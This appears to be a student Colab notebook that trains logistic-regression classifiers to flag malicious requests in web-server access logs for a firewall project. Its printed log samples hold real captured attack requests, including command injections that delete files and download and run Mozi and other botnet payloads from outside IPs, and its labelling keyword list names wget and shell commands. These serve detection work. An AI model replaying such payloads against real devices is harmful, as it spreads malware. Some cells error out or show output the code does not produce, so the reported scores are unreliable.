<a href="https://colab.research.google.com/github/Venckus/toai_firewall_10mk4/blob/master/project.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# 1 Imports

In [ ]:
from os import listdir
from os.path import isfile, join
import itertools
import numpy as np
import pandas as pd

In [ ]:
%load_ext autoreload
%autoreload 2
%matplotlib inline

In [ ]:
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer, TfidfTransformer
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
from sklearn import metrics

In [ ]:
# google drive
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


## 1.1 Read all files in `data` directory

In [ ]:
!pwd

/content


In [ ]:
!ls 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data/'

2021-01-001.log  2021-01-012.log  access.log.11  access.log.21	access.log.5
2021-01-002.log  2021-01-013.log  access.log.12  access.log.22	access.log.6
2021-01-003.log  2021-01-014.log  access.log.13  access.log.23	access.log.7
2021-01-004.log  2021-01-015.log  access.log.14  access.log.24	access.log.8
2021-01-005.log  2021-01-016.log  access.log.15  access.log.25	access.log.9
2021-01-006.log  2021-01-017.log  access.log.16  access.log.26	c2021-01.log
2021-01-007.log  2021-01-018.log  access.log.17  access.log.27	c2021-02.log
2021-01-008.log  2021-01-019.log  access.log.18  access.log.28	c2021-03.log
2021-01-009.log  access.log	  access.log.19  access.log.29	c2021-04.log
2021-01-010.log  access.log.1	  access.log.2	 access.log.3	c2021-05.log
2021-01-011.log  access.log.10	  access.log.20  access.log.4


In [ ]:
!tail -10 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data/access.log'

103.149.192.199 - - [17/Oct/2020:06:35:02 +0200] "GET / HTTP/1.1" 200 396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
213.32.122.82 - - [17/Oct/2020:06:46:43 +0200] "GET / HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
119.159.225.189 - - [17/Oct/2020:07:14:06 +0200] "GET /admin//config.php HTTP/1.1" 404 232 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
91.241.19.173 - - [17/Oct/2020:07:23:15 +0200] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:22:54 +0200] "\x05\x01\x00" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:24:12 +0200] "\x04\x01\x00P\x05\xBC\xD2\xE3\x00" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:25:25 +0200] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 209 "https://www.google.com/" "Moz

In [ ]:
# read all data files
mypath = 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data'
data_files = [f for f in listdir(mypath) if isfile(join(mypath, f))]
data_files

['access.log.15',
 'access.log.16',
 'access.log.17',
 'access.log.18',
 'access.log.19',
 'access.log.20',
 'access.log.21',
 'access.log.22',
 'access.log.23',
 'access.log.24',
 'access.log.25',
 'access.log.26',
 'access.log.28',
 'access.log.27',
 'access.log.29',
 'access.log.14',
 'access.log.13',
 'access.log.12',
 'access.log.11',
 'access.log.10',
 'access.log.9',
 'access.log.8',
 'access.log.1',
 'access.log',
 'access.log.2',
 'access.log.3',
 'access.log.4',
 'access.log.5',
 'access.log.6',
 'access.log.7',
 '2021-01-015.log',
 '2021-01-014.log',
 '2021-01-013.log',
 '2021-01-012.log',
 '2021-01-011.log',
 '2021-01-010.log',
 '2021-01-009.log',
 '2021-01-008.log',
 '2021-01-007.log',
 '2021-01-006.log',
 '2021-01-005.log',
 '2021-01-004.log',
 '2021-01-003.log',
 '2021-01-002.log',
 '2021-01-001.log',
 '2021-01-019.log',
 '2021-01-018.log',
 'c2021-05.log',
 '2021-01-017.log',
 'c2021-04.log',
 '2021-01-016.log',
 'c2021-03.log',
 'c2021-02.log',
 'c2021-01.log']

## 1.2 Add all files data into one Pandas dataframe

In [ ]:
%%time
li = []
for f in data_files:
    tmp = pd.read_csv(f'{mypath}/{f}', sep='\s+', header=None)
    li.append(tmp)
df = pd.concat(li, axis=0, ignore_index=True)

CPU times: user 446 ms, sys: 36.1 ms, total: 482 ms
Wall time: 23 s


# 2 Explore and prepare data

In [ ]:
df.head()

,0,1,2,3,4,5,6,7,8,9
0,66.240.205.34,-,-,[26/Sep/2020:07:26:07,+0200],Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``...,400,182,-,-
1,176.113.115.214,-,-,[26/Sep/2020:07:27:21,+0200],GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
2,199.195.254.38,-,-,[26/Sep/2020:08:04:18,+0200],GET ../../proc/ HTTP,400,182,-,-
3,176.113.115.214,-,-,[26/Sep/2020:08:07:45,+0200],POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
4,156.146.36.72,-,-,[26/Sep/2020:08:19:34,+0200],GET /robots.txt HTTP/1.1,404,232,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...


In [ ]:
df.shape

(83763, 10)

In [ ]:
df.isna().sum()

0     0
1     0
2     0
3     0
4     0
5    92
6     0
7     0
8     0
9     0
dtype: int64

In [ ]:
df[1].describe()

count     83763
unique        1
top           -
freq      83763
Name: 1, dtype: object

## 2.1 Remove useless data

### 2.1.1 Renove columns

In [ ]:
rm_colls =[1,2,4,8]
df.drop(df.columns[rm_colls], axis=1, inplace=True)

Give names to columns

In [ ]:
columns = {0:'IP',3:'date',5:'full_request',6:'code',7:'bytes',9:'agent'}
df.rename(columns=columns,inplace=True)

remove rows with `full_request` = nan

In [ ]:
df = df[df['full_request'].notna()]

remove '[' from date_time column

In [ ]:
df['date'] = df['date'].str[1:]

In [ ]:
df.head()

,IP,date,full_request,code,bytes,agent
0,66.240.205.34,26/Sep/2020:07:26:07,Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``...,400,182,-
1,176.113.115.214,26/Sep/2020:07:27:21,GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
2,199.195.254.38,26/Sep/2020:08:04:18,GET ../../proc/ HTTP,400,182,-
3,176.113.115.214,26/Sep/2020:08:07:45,POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
4,156.146.36.72,26/Sep/2020:08:19:34,GET /robots.txt HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...


In [ ]:
df.shape

(83671, 6)

### 2.1.2 Remove rows

In [ ]:
# drop ssl encoded rows
dft = df[~df['full_request'].str.contains(fr"\\x", regex=True)]
dft.shape

(83231, 6)

In [ ]:
dft = dft.join(
    dft['full_request'].str.split(' ', 2, expand=True)
    .rename(columns={0:'method', 1:'request', 2:'http_v'}))

In [ ]:
dft.request.isnull().sum()

0

In [ ]:
# drop rows where request is `NaN`.
dft.dropna(subset=['request'], inplace=True)

In [ ]:
dft = dft[dft['request'] != '/']

In [ ]:
dft.request.describe()

count                                                 48899
unique                                                 9640
top       /index.php?mact=CmsJobManager,cntnt01,process,...
freq                                                   2366
Name: request, dtype: object

In [ ]:
dft.head()

,IP,date,full_request,code,bytes,agent,method,request,http_v
1,176.113.115.214,26/Sep/2020:07:27:21,GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,GET,/vendor/phpunit/phpunit/src/Util/PHP/eval-stdi...,HTTP/1.1
2,199.195.254.38,26/Sep/2020:08:04:18,GET ../../proc/ HTTP,400,182,-,GET,../../proc/,HTTP
3,176.113.115.214,26/Sep/2020:08:07:45,POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,POST,/vendor/phpunit/phpunit/src/Util/PHP/eval-stdi...,HTTP/1.1
4,156.146.36.72,26/Sep/2020:08:19:34,GET /robots.txt HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,GET,/robots.txt,HTTP/1.1
5,156.146.36.72,26/Sep/2020:08:19:34,GET /xmlrpc.php?rsd HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,GET,/xmlrpc.php?rsd,HTTP/1.1


In [ ]:
# check if there is even line number for 50% split
if dft.shape[0] % 2 == 1:
  dft = dft[:-1]
dft.shape

(83178, 10)

## 2.2 Split `full_request` column into `method`, `request`, `http version`.

## 2.3 Explore requests

In [ ]:
dft.request[1100:1300].values

array(['/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://60.243.48.141:35921/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1',
       '/.env', '/admin//config.php', '/boaform/admin/formLogin',
       '/shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws',
       '/xmlrpc.php', '/blog/xmlrpc.php', '/wp-login.php',
       '/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.sh%20-O%2012.awGawgf.sh;curl%20-O%20http://185.172.111.196/awGawgf.sh%20-O%2011.awGawgf.sh;%20chmod%20777%20*;%20sh%2011.awGawgf.sh;%20sh%2012.awGawgf.sh)&password=admin',
       '/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.

Potential malitious requests:
die, md5, phpunit, .env,

# 3 Data labeling

## 3.1 Functions used to filter malicious requests using keywords 

In [ ]:
def find_bad(tmp_df, phrase):
    'Find rows by keyword phrase using regex'
    new_df = tmp_df[tmp_df.requests.str.contains(phrase, regex=True, na=False)]
    return new_df

In [ ]:
def build_phrase(list):
    tmp = ''
    for word in list:
        if tmp == '': tmp = f'{word}'
        else: tmp = f'{tmp}|{word}'
    return tmp

In [ ]:
def get_bad_requests(tmp1_df, keywords):
  bad_requests_phrase = build_phrase(keywords)
  bad_requests_rows = tmp1_df[tmp1_df.request.str.contains(bad_requests_phrase, regex=True, na=False)]
  return bad_requests_rows

### 3.1.1 all bad requests

In [ ]:
bad_chars = [
  '\.', '\@', '\{', '\}', '\(', '\)', '\+', '\_', '\;',
]

In [ ]:
bad_words = [
    'cgi', 'shell', 'die', 'md5', 'phpunit', 'env', 'sh', 
    'ls', 'cd', 'rm', 'rf', 'wget', 'cmod', 'chown',
    'ZINFO', 'fig', 'script', 'php', 'w00t', 'https', 'com',
    '\%6e', '\%6c', '\%6d', '\%61', '\%63','\%64', '\%65', '\%66', '\%67', '\%68', '\%69',
    '\%7a', '\%70', '\%72', '\%73', '\%74', '\%75', '\%76', '\%77', '\%78', '\%79',
]

### 3.1.2 Labeling. TODO nuo cia galima viska det i pipeline

In [ ]:
bad_char_requests = get_bad_requests(dft, bad_chars)
bad_char_requests.shape

(38091, 9)

In [ ]:
bad_word_requests = get_bad_requests(dft, bad_words)
bad_word_requests.shape

(16438, 10)

## 3.2 Good requests

In [ ]:
# good_char_requests = bad_char_requests.merge(dft, how='outer', indicator=True).loc[lambda x : x['_merge']=='right_only']
good_word_requests = bad_word_requests.merge(dft, how='outer', indicator=True).loc[lambda x : x['_merge']=='right_only']

In [ ]:
# good_char_requests.shape
good_word_requests.shape

(32461, 11)

# 4 Split and vectorize data

## 4.1 Split data

In [ ]:
dft['is_safe'] = dft.request.isin(good_word_requests.request).astype(bool)

In [ ]:
dft[450:455]

,IP,date,full_request,code,bytes,agent,method,request,http_v,is_safe
987,206.189.47.136,19/Sep/2020:07:59:24,GET /.env HTTP/1.1,404,152,python-requests/2.24.0,GET,/.env,HTTP/1.1,False
989,45.14.44.2,19/Sep/2020:08:04:03,HEAD /robots.txt HTTP/1.0,404,0,-,HEAD,/robots.txt,HTTP/1.0,True
991,192.241.233.55,19/Sep/2020:08:13:17,GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2...,404,209,Mozilla/5.0 zgrab/0.x,GET,/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f,HTTP/1.1,False
1025,122.51.187.225,19/Sep/2020:09:31:16,GET /TP/public/index.php HTTP/1.1,404,152,Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US;...,GET,/TP/public/index.php,HTTP/1.1,False
1026,122.51.187.225,19/Sep/2020:09:31:16,GET /TP/index.php HTTP/1.1,404,152,Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US;...,GET,/TP/index.php,HTTP/1.1,False


In [ ]:
queries = dft['request'].to_list()

In [ ]:
y = dft['is_safe'].to_list()

In [ ]:
len(y)

48899

In [ ]:
# 50% split
mid = int(len(y) / 2)
trn_y = y[:mid]
val_y = y[mid:]

In [ ]:
len(trn_y)

24449

In [ ]:
trn = queries[:mid]
val = queries[mid:]
len(queries), len(trn), len(val)

(48899, 24449, 24450)

## 4.2 TfidfVectorizer

In [ ]:
vectorizer = TfidfVectorizer(
    min_df=0.0, 
    analyzer="word", 
    sublinear_tf=True, 
    ngram_range=(1,3))
X = vectorizer.fit_transform(queries)

In [ ]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

In [ ]:
lgs = LogisticRegression(class_weight={1: 2 * len(good_requests) / len(bad_word_requests), 0: 1.0})

In [ ]:
%%time
lgs.fit(X_train, y_train)

CPU times: user 1.48 s, sys: 1.88 s, total: 3.36 s
Wall time: 1.74 s


LogisticRegression(C=1.0, class_weight={0: 1.0, 1: 3.949507239323519},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

## 4.3 CountVectorizer - trigram NB features

In [ ]:
veczr = CountVectorizer(analyzer='word')

In [ ]:
%%time
trn_term_doc1 = veczr.fit_transform(trn)
val_term_doc1 = veczr.transform(val)

CPU times: user 327 ms, sys: 0 ns, total: 327 ms
Wall time: 328 ms


In [ ]:
trn_term_doc1

<24449x4165 sparse matrix of type '<class 'numpy.int64'>'
	with 144074 stored elements in Compressed Sparse Row format>

In [ ]:
vocab = veczr.get_feature_names(); vocab[600:650]

In [ ]:
w0 = set([o.lower() for o in trn[0].split(' ')]); w0

{'/vendor/phpunit/phpunit/src/util/php/eval-stdin.php'}

In [ ]:
m = LogisticRegression(C=1e8)
m.fit(trn_term_doc1, y_train)

ValueError: ignored

# 5 Evaluation

## 5.1 tfidf vectorizer

In [ ]:
def print_score(m, _df, pred, x_test, y_test):
  fpr, tpr, _ = metrics.roc_curve(y_test, (m.predict_proba(x_test)[:, 1]))
  auc = metrics.auc(fpr, tpr)
  # print(f"All rows: {len(_df.IP)}, bad request count: {len(bad_requests)}")
  # print("Baseline Constant negative: %.6f" % (len(_df.IP) / (len(_df.IP) + len(bad_requests))))
  print("Accuracy: %f" % m.score(x_test, y_test))  #checking the accuracy
  print("Precision: %f" % metrics.precision_score(y_test, pred))
  print("Recall: %f" % metrics.recall_score(y_test, pred))
  print("F1-Score: %f" % metrics.f1_score(y_test, pred))
  print("AUC: %f" % auc)

In [ ]:
print_score(lgs, dft, predicted, X_test, y_test)

All rows: 83230, bad request count: 7729
Baseline Constant negative: 0.915028
Accuracy: 0.993488
Precision: 0.992875
Recall: 1.000000
F1-Score: 0.996425
AUC: 0.999736


## 5.2 CountVectorizer

In [ ]:
preds = m.predict(val_term_doc1)
(preds==val_y).mean()

0.5762923779754748

# 6 Pipeline

## 6.1 Labeling

In [ ]:
def set_label(df_l, bad_data):
  bad_req = get_bad_requests(df_l, bad_data)
  good_req = bad_req.merge(dft, how='outer', indicator=True).loc[lambda x : x['_merge']=='right_only']
  df_l['is_safe'] = df_l.request.isin(good_req.request).astype(bool)
  return df_l, bad_req, good_req

In [ ]:
dft, bad_requests, good_requests = set_label(dft, bad_words)

## 6.2 Split and prepare

In [ ]:
# analyzer 'word' or 'char'
def get_vectorizers(analyzer, ngram=(1,3), max_features=40000):
  t_veczr = TfidfVectorizer(ngram_range=ngram,
                            min_df=0.0, 
                            analyzer=analyzer,
                            max_features=max_features, 
                            sublinear_tf=True)
  c_veczr = CountVectorizer(ngram_range=ngram,
                            analyzer=analyzer, 
                            max_features=max_features)
  return t_veczr, c_veczr

In [ ]:
dft.shape

(48899, 10)

In [ ]:
x = dft['request'].to_list()

In [ ]:
y = dft['is_safe'].to_list()

In [ ]:
int(len(y) * 0.8)

39119

In [ ]:
# train, test, validation : 40% 30% 30%
def split_lst(lst):
  split_trn = int(len(lst) * 0.4)
  trn_lst = lst[:split_trn]
  tmp_lst = lst[split_trn:]
  split_val = int(len(tmp_lst) / 2)
  test_lst = tmp_lst[:split_val]
  val_lst = tmp_lst[split_val:]
  return trn_lst, test_lst, val_lst

In [ ]:
# tfidf
def split_val(l, split=0.7):
  mid = int(len(y) * split)
  t = l[:mid]
  v = l[mid:]
  return t, v

In [ ]:
# parameter tuning
trn_y, test_y, val_y = split_lst(y)

In [ ]:
trn_y, test_y = split_val(y)

In [ ]:
len(trn_y), len(test_y) #, len(val_y)

(34229, 14670)

In [ ]:
# parameter tuning
trn_x, test_x, val_x = split_lst(x)

In [ ]:
trn_x, test_x = split_val(x)

In [ ]:
len(trn_x), len(test_x) # , len(val_x)

(34229, 14670)

In [ ]:
y[0]

False

In [ ]:
t_trn_y, t_val_y = split_val(y)

In [ ]:
len(t_trn_y), len(t_val_y)

(34229, 14670)

In [ ]:
t_trn_x, t_val_x = split_val(x)

In [ ]:
t_veczr, c_veczr = get_vectorizers('word')

In [ ]:
%time X = t_veczr.fit_transform(x)

CPU times: user 845 ms, sys: 374 µs, total: 846 ms
Wall time: 848 ms


In [ ]:
X[0]

<1x23898 sparse matrix of type '<class 'numpy.float64'>'
	with 22 stored elements in Compressed Sparse Row format>

In [ ]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

## 6.3 models

### 6.3.1 TfidfVectorizer

In [ ]:
tf_m = LogisticRegression(
    C=1e4, # C=0.1,
    class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0})

In [ ]:
%time tf_m.fit(X_train, y_train)

CPU times: user 1.52 s, sys: 2.2 s, total: 3.72 s
Wall time: 1.9 s


/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
  extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)


LogisticRegression(C=10000.0, class_weight={0: 1.0, 1: 3.949507239323519},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

### 6.3.2 CountVectorizer

In [ ]:
%%time
trn_term_doc = c_veczr.fit_transform(trn_x)
val_term_doc = c_veczr.transform(test_x)

CPU times: user 866 ms, sys: 0 ns, total: 866 ms
Wall time: 868 ms


Using regularization. Crossentropy =~ rmse. (For classification). youtube lesson 11 22:58

In [ ]:
y1 = trn_y
x1 = trn_term_doc.sign()
c_test_x = val_term_doc.sign()
p = x1[y1==1].sum(0)+1
q = x1[y1==0].sum(0)+1
r = np.log((p/p.sum())/(q/q.sum()))
b = np.log(len(p)/len(q))

In [ ]:
c_m = LogisticRegression(C=1e4,
                         class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0})
c_m.fit(x1, y1)

/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
  extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)


LogisticRegression(C=10000.0, class_weight={0: 1.0, 1: 3.949507239323519},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

Naive Biase with multiplication

## 6.4 Evaluation

### 6.4.1 TfidfVectorizer

In [ ]:
tf_preds = tf_m.predict(X_test)

In [ ]:
print_score(tf_m, dft, tf_preds, X_test, y_test)

Accuracy: 0.997137
Precision: 0.995882
Recall: 0.999847
F1-Score: 0.997860
AUC: 0.999941


In [ ]:
# single prediction
val_1 = t_veczr.transform(['robots.txt']) #val_x[109]
tf_m.predict(val_1)
# final_model.predict(val_1)

array([ True])

In [ ]:
t_matrix = t_veczr.fit_transform(x)

### 6.4.2 CountVectorizer

In [ ]:
c_preds = c_m.predict(val_term_doc)
# (c_preds.T==test_y).mean()
print_score(c_m, dft, c_preds, val_term_doc, test_y)

Accuracy: 0.998978
Precision: 0.999224
Recall: 0.999321
F1-Score: 0.999273
AUC: 0.999884


In [ ]:
pr = c_veczr.transform(['robots.txt'])
c_m.predict(pr)

array([ True])

Here we fit regularized logistic regression where the features are the trigrams log-count ratios. fastai youtube lesson 11 26:40

In [ ]:
x_nb = x1.multiply(r)
c_m.fit(x_nb, y1)

LogisticRegression(C=10000.0, class_weight={0: 1.0, 1: 3.949507239323519},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

In [ ]:
np.exp(x_nb)

TypeError: ignored

In [ ]:
val_x_nb = c_test_x.multiply(r)
c_preds2 = c_m.predict(val_x_nb)
# (preds2.T==test_y).mean()
print_score(c_m, dft, c_preds, val_term_doc, test_y)

All rows: 48899, bad request count: 16438
Baseline Constant negative: 0.748412
Accuracy: 0.701431
Precision: 0.998834
Recall: 0.998980
F1-Score: 0.998907
AUC: 0.500000


# 7 Grid search

## 7.1 Pipeline

In [ ]:
pipeline = Pipeline([
  ('tf_vect', TfidfVectorizer()),
  ('c_vect', CountVectorizer()),
  ('model', LogisticRegression()),
])

In [ ]:
parameters = {
  'c_vect__max_df': (0.0,), #(0.5, 0.75),
  'c_vect__max_features': (5000,), # 10000, 20000, 40000),
  'tf_vect__analyzer': ('word',),
  'c_vect__analyzer': ('word',),
  'tf_vect__ngram_range': ((1, 3),), # (1, 4), (1, 5)),
  'c_vect__ngram_range': ((1, 3),), # (1, 4), (1, 5)),  # unigrams or bigrams
  'model__C': (0.1,), # 1e6, 1e8),
  'model__class_weight': ({1: 2 * len(good_requests) / len(bad_requests), 0: 1.0},),
  # 'tfidf__use_idf': (True, False),
  # 'tfidf__norm': ('l1', 'l2'),
  # 'clf__max_iter': (20,),
  # 'clf__alpha': (0.00001, 0.000001),
  # 'clf__penalty': ('l2', 'elasticnet'),
  # 'clf__max_iter': (10, 50, 80),
}

In [ ]:
grid_search = GridSearchCV(pipeline, parameters, n_jobs=-1, verbose=1)

In [ ]:
grid_search.fit(list(trn_term_doc), trn_y)

ValueError: ignored

In [ ]:
grid_search.best_score_

nan

## 7.2 Custom parameter search

In [ ]:
def set_pipe(ngram, max_features, c):
  t_vtrz, c_vtrz = get_vectorizers('word', ngram, max_features)
  mdl = LogisticRegression(C=c, class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0})
  return t_ctrz, c_vtrz, mdl, mdl

In [ ]:
ng = [(1,3)] # , (1,4), (1,5)
mf = [30000, 40000, 50000]
cc = [1e4] # , 5000, 2e4
# for comb in itertools.product(ng, mf, cc):
#   print(comb)

In [ ]:
for comb in itertools.product(ng, mf, cc):
  # t_ctrz, c_ctrz, mdl_t, mdl_c = set_pipe(comb[0], comb[1], comb[2])
  t_ctrz, c_ctrz = get_vectorizers('word', comb[0], comb[1])
  mdl_t = LogisticRegression(C=comb[2], class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0})
  mdl_c = LogisticRegression(C=comb[2], class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0})
  mdl_sgd = SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3, random_state=42, max_iter=5, tol=None)
  # tfidf
  X1 = t_ctrz.fit_transform(x)
  X_train, X_test, y_train, y_test = train_test_split(X1, y, test_size=0.7, random_state=42)
  mdl_t.fit(X_train, y_train)
  tf_preds1 = mdl_t.predict(X_test)
  # count
  trn_y, test_y = split_val(y)
  trn_x, test_x = split_val(x)
  trn_term_doc = c_ctrz.fit_transform(trn_x)
  val_term_doc = c_ctrz.transform(test_x)
  y1 = trn_y
  x1 = trn_term_doc.sign()
  c_test_x = val_term_doc.sign()
  p = x1[y1==1].sum(0)+1
  q = x1[y1==0].sum(0)+1
  r = np.log((p/p.sum())/(q/q.sum()))
  b = np.log(len(p)/len(q))
  mdl_c.fit(x1, y1)
  c_preds1 = mdl_c.predict(val_term_doc)
  # SGD
  mdl_sgd.fit(trn_term_doc, trn_y)
  sgd_preds = mdl_sgd.predict(val_term_doc)
  # print result
  print("="*10+f" Params - ngram: {comb[0]}, max_features: {comb[1]}, regularization: {comb[2]}")
  print("... TfidfVectorizer:")
  print_score(mdl_t, dft, tf_preds1, X_test, y_test)
  print("... CountVectorizer:")
  print_score(mdl_c, dft, c_preds1, val_term_doc, test_y)
  print("... SGDClassifier: ")
  print(f'accuracy: {metrics.accuracy_score(sgd_preds, test_y)}')

/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
  extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)
/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression


========== Params - ngram: (1, 3), max_features: 30000, regularization: 10000.0
... TfidfVectorizer:
Accuracy: 0.992989
Precision: 0.990467
Recall: 0.999030
F1-Score: 0.994730
AUC: 0.999680
... CountVectorizer:
Accuracy: 0.998978
Precision: 0.999224
Recall: 0.999321
F1-Score: 0.999273
AUC: 0.999884
... SGDClassifier: 
accuracy: 0.9950920245398773


/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
  extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)
/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression


========== Params - ngram: (1, 3), max_features: 40000, regularization: 10000.0
... TfidfVectorizer:
Accuracy: 0.992989
Precision: 0.990467
Recall: 0.999030
F1-Score: 0.994730
AUC: 0.999680
... CountVectorizer:
Accuracy: 0.998978
Precision: 0.999224
Recall: 0.999321
F1-Score: 0.999273
AUC: 0.999884
... SGDClassifier: 
accuracy: 0.9950920245398773


/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
  extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)
